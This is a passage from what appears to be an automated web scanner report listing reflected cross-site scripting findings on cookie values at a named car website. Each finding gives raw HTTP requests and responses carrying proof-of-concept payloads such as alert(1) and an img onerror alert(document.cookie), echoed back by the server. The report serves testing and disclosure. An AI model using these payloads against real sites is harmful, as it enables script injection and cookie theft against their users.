Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=86827"%3balert(1)//219d19e185b; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:34:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:34:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=86827;expires=Wed, 16-Jan-2041 23:34:18 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:34:18 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 104108


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
= "research|rhp";
           
           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "86827";alert(1)//219d19e185b||";
           
           s.prop14 = "new car home page : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research|||rec|sky|ban|
...[SNIP]...

4.2066. http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/kbb/index.cfm/action/selectyear/valuetype/TI

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94665"%3balert(1)//bf978242d4f was submitted in the BDATALIST cookie. This input was echoed as 94665";alert(1)//bf978242d4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/research/kbb/index.cfm/action/selectyear/valuetype/TI HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c494665"%3balert(1)//bf978242d4f; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:27:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:27:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:27:29 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:27:29 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 37517


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c494665";alert(1)//bf978242d4f";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47874158-EA8D-D728-D164A9E4
...[SNIP]...

4.2067. http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/kbb/index.cfm/action/selectyear/valuetype/TI

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bbbd"%3balert(1)//71b5ba10f64 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 3bbbd";alert(1)//71b5ba10f64 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/research/kbb/index.cfm/action/selectyear/valuetype/TI HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=3bbbd"%3balert(1)//71b5ba10f64; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 37517
Expires: Mon, 24 Jan 2011 23:32:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:32:13 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:32:13 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:32:13 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
bresearch|";
           
           //s.prop9 = "kbbresearch|Search Engine Optimization Project|13148";
           s.prop10 = "kbbresearch|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "3bbbd";alert(1)//71b5ba10f64||";
           
           s.prop14 = "research|kelley blue book|trade-in value|standalone interface|selectyear : Search Engine Optimization Project entry page";
           s.prop15 = "No Article|No Article";
           s.prop16
...[SNIP]...

4.2068. http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI [PV_CT cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/kbb/index.cfm/action/selectyear/valuetype/TI

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 9794b<img%20src%3da%20onerror%3dalert(1)>df36346d341 was submitted in the PV_CT cookie. This input was echoed as 9794b<img src=a onerror=alert(1)>df36346d341 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/research/kbb/index.cfm/action/selectyear/valuetype/TI HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=29794b<img%20src%3da%20onerror%3dalert(1)>df36346d341; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 45242
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:30:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:30:41 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:30:41 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:30:41 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 29794b<img src=a onerror=alert(1)>df36346d341 cannot be converted to a number.
</h1>
...[SNIP]...

4.2069. http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bd2a"%3balert(1)//999c0c1f693 was submitted in the BDATALIST cookie. This input was echoed as 3bd2a";alert(1)//999c0c1f693 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c43bd2a"%3balert(1)//999c0c1f693; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:25:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:25:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:25:21 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:25:21 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 34716


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c43bd2a";alert(1)//999c0c1f693";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4773AD7A-08D7-B896-73EA55F0
...[SNIP]...

4.2070. http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7009a"%3balert(1)//52968e6c274 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 7009a";alert(1)//52968e6c274 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=7009a"%3balert(1)//52968e6c274; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:26:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:26:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:26:37 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:26:37 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 34716


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
oyota_Highlander";
           
           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "7009a";alert(1)//52968e6c274||";
           
           s.prop14 = "research|top 10|top10 : Search Engine Optimization Project entry page";
           s.prop15 = "No Article|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research|
...[SNIP]...

4.2071. http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 [PV_CT cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 771ce<img%20src%3da%20onerror%3dalert(1)>7f34c2e9ef2 was submitted in the PV_CT cookie. This input was echoed as 771ce<img src=a onerror=alert(1)>7f34c2e9ef2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2771ce<img%20src%3da%20onerror%3dalert(1)>7f34c2e9ef2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 42450
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:25:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:25:50 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:25:49 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:25:49 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 2771ce<img src=a onerror=alert(1)>7f34c2e9ef2 cannot be converted to a number.
</h1>
...[SNIP]...

4.2072. http://www.autobytel.com/coupons/my-garage.htm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /coupons/my-garage.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 942f9"%3balert(1)//3060dbd7fa4 was submitted in the BDATALIST cookie. This input was echoed as 942f9";alert(1)//3060dbd7fa4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coupons/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4942f9"%3balert(1)//3060dbd7fa4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:51:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:51:37 GMT
Content-Length: 22137
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:51:36 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4942f9";alert(1)//3060dbd7fa4";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4863F801-A43C-E980-57F6CC81
...[SNIP]...

4.2073. http://www.autobytel.com/coupons/my-garage.htm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /coupons/my-garage.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f0e7"%3balert(1)//bf390352214 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 5f0e7";alert(1)//bf390352214 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coupons/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=5f0e7"%3balert(1)//bf390352214; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:17 GMT
Content-Length: 22137
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:17 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
s.prop6 = "";
           //s.prop7 = "|";
           
           //s.prop9 = "|Search Engine Optimization Project|13148";
           s.prop10 = "|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "5f0e7";alert(1)//bf390352214||";
           
           s.prop14 = "my garage page|coupons : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "||||||Search Engin
...[SNIP]...

4.2074. http://www.autobytel.com/diagnose-problem/my-garage.htm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /diagnose-problem/my-garage.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf94b"%3balert(1)//da95038b8f8 was submitted in the BDATALIST cookie. This input was echoed as bf94b";alert(1)//da95038b8f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /diagnose-problem/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
